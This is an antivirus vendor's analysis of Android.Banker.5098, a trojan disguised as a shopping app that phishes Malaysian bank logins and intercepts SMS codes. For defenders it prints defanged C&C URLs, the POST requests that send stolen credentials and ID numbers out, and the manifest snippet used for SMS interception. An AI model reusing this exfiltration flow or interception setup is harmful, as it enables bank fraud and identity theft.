Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Android.Banker.5098

Added to the Dr.Web virus database: 2022-10-05

Virus description added:

  • SHA1: fafc06e02b5b8ab79a69c74376bb01de85d0c06c

Description

Android.Banker.5098 is a malicious application for Android-based devices that targets customers of various banks. It steals the logins and passwords required to access remote banking services and also intercepts SMS containing one-time confirmation codes (or mTAN codes). Moreover, this malware sends users’ personal information to attackers. Android.Banker.5098 is distributed in the guise of various shopping apps which, at first glance, look and operate like full-fledged apps of this kind. In reality though, the trojan has no useful functionality and only misleads users. The modification in question was distributed under the guise of the “Pinky Cat” store.

Operating routine

This fake online shopping app allows users to browse products and add them to the cart.

#drweb#drweb#drweb

At the checkout stage, the trojan asks the user to provide the following data, which is allegedly necessary to ship the order:

  • name;
  • mobile phone number;
  • address;
  • date of birth;
  • Identification Card Number (or IC, also known as Identity Number).

#drweb

Next, the trojan simulates the process of paying for the goods. To do so, it sends a POST request to the C&C server and receives a response containing a list of fake bank forms:

hxxps[:]//mall-base[.]com/app/api/action/getBankList/

The application type is sent in this request:


{"appType":"CAT"}

The server response containing the list of phishing forms:


{
   "statusCode":200,
   "resultMsg":"Success",
   "data":[
      {
         "id":1,
         "bankName":"MAYBANK",
         "pathUrl":"hxxps[:]//pay[.]mall-base[.]com/maybank/pay.html",
         "imgUrl":"hxxps[:]//pay[.]mall-base[.]com/icon/maybank.png"
      },
      {
         "id":2,
         "bankName":"HLB CONNECT",
         "pathUrl":"hxxps[:]//pay[.]mall-base[.]com/hlb/pay.html",
         "imgUrl":"hxxps[:]//pay[.]mall-base[.]com/icon/hlb.png"
      },
      {
         "id":3,
         "bankName":"CIMB",
         "pathUrl":"hxxps[:]//pay[.]mall-base[.]com/cimb/pay.html",
         "imgUrl":"hxxps[:]//pay[.]mall-base[.]com/icon/cimb.png"
      },
      {
         "id":4,
         "bankName":"PUBLIC BANK",
         "pathUrl":"hxxps[:]//pay.mall-base[.]com/pcb/pay.html",
         "imgUrl":"hxxps[:]//pay.mall-base[.]com/icon/pcb.png"
      },
      {
         "id":5,
         "bankName":"AFFIN BANK",
         "pathUrl":"hxxps[:]//pay.mall-base[.]com/affin/pay.html",
         "imgUrl":"hxxps[:]//pay.mall-base[.]com/icon/affin.png"
      },
      {
         "id":11,
         "bankName":"BSN",
         "pathUrl":"hxxps[:]//pay[.]mall-base[.]com/bsn/pay.html",
         "imgUrl":"hxxps[:]//pay.mall-base[.]com/icon/bsn.png"
      },
      {
         "id":25,
         "bankName":"Bank Islam",
         "pathUrl":"hxxps[:]//pay[.]mall-base[.]com/bimb/pay.html",
         "imgUrl":"hxxps[:]//pay[.]mall-base[.]com/icon/bimb.png"
      },
      {
         "id":92,
         "bankName":"AMBANK",
         "pathUrl":"hxxps[:]//pay[.]mall-base[.]com/ambb/pay.html",
         "imgUrl":"hxxps[:]//pay.mall-base[.]com/icon/ambb.png"
      },
      {
         "id":104,
         "bankName":"Alliance Bank",
         "pathUrl":"hxxps[:]//pay.mall-base[.]com/abmb/pay.html",
         "imgUrl":"hxxps[:]//pay.mall-base[.]com/icon/abmb.png"
      }
   ]
}

Next, the user is asked to select one of the banks from the list, as shown below:

#drweb

When a bank is selected, a request is sent to the C&C server. In response, the server returns the malicious form corresponding to this bank. The data that the user provided earlier is also sent in this request. An example of this is shown below:


hxxps[:]//pay[.]mall-base[.]com/pcb/pay.html?token=***&phoneNumber=***&ic=***&device_id=***&app_type=CAT

where:

  • token―a token for a current session;
  • app_type―an internal name of the trojan application;
  • device_id―an Android device ID;
  • phoneNumber―a mobile phone number;
  • ic―an IC number (an Identification Card Number, or an Identity Number).

Next, the trojan loads the downloaded phishing form. In this form, the victim is asked to enter their bank account name and password to complete the transaction. No matter what data is entered here, the user will see a message stating that the payment has failed. At the same time, the information provided will be sent to the hxxps[:]//pay[.]mall-base[.]com server.

#drweb#drweb#drweb

An example of a request that is executed from the webpage of a phishing form after it has been confirmed that banking data was entered:


POST hxxps[:]//pay[.]mall-base[.]com/common/save.php HTTP/2
{"appType":"CAT","username":"***","password":"***","phoneNumber":"***","deviceId":"***","bankName":"PUBLIC BANK","ic":"***"}

Android.Banker.5098 intercepts SMS to hijack one-time banking codes and other information. The trojan is created using a flutter framework and uses a Telephony plugin which is deployed to intercept SMS.

To be able to control SMS functionality, the trojan requests the corresponding system permission:

#drweb

So that SMS can be intercepted, the receiver of the Telephony plugin is registered in the trojan’s manifest file:


   <receiver android:name="com.shounakmulay.telephony.sms.IncomingSmsReceiver" android:permission="android.permission.BROADCAST_SMS" android:exported="true">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>

The intercepted messages are transferred to a remote server in a POST request:

hxxps[:]//mall-base[.]com/app/api/action/smsMessagePushAction/

News about the trojan

Recommandations pour le traitement


Android

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile le produit antivirus gratuit Dr.Web для Android Light. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur une violation grave de la loi ou une demande de rançon s’affichent sur l'écran de l'appareil mobile), procédez comme suit :
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil contaminé le produit antivirus gratuit Dr.Web для Android Light et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android